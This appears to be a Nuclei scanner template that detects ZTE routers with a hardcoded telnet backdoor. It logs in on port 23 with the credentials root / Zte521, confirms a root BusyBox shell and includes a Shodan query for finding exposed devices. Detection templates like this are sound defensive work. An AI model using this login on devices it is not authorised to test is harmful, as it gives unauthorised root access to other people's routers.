id: backdoored-zte

info:
  name: ZTE Router Panel - Detect
  author: its0x08
  severity: critical
  description: |
    Multiple ZTE router panels were detected. These routers have a telnet-hardcoded backdoor account that spawns root shell.
  reference:
    - https://www.exploit-db.com/ghdb/7179
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10
    cwe-id: CWE-912
  metadata:
    max-request: 1
    shodan-query: http.html:"ZTE Corporation"
    verified: true
  tags: edb,network,zte,telnet,backdoor,router

tcp:
  - host:
      - "{{Hostname}}"
    port: 23
    inputs:
      - data: "root\r\n"
      - data: "Zte521\r\n\r\n"
        read: 1024

    matchers:
      - type: word
        words:
          - "BusyBox"

    extractors:
      - type: regex
        regex:
          - '[A-Z]{1,}[0-9]{3,4}'
# digest: 490a0046304402200c57b6300163f78de1cbb17f110711e58a274b70fcc9bf2cabbcae412db1a80502201d6654493281369dfcc09b5d75344e9ecaea3d18ff4389c2e175b030be4dd4e5:922c64590222798bb761d5b6d8e72950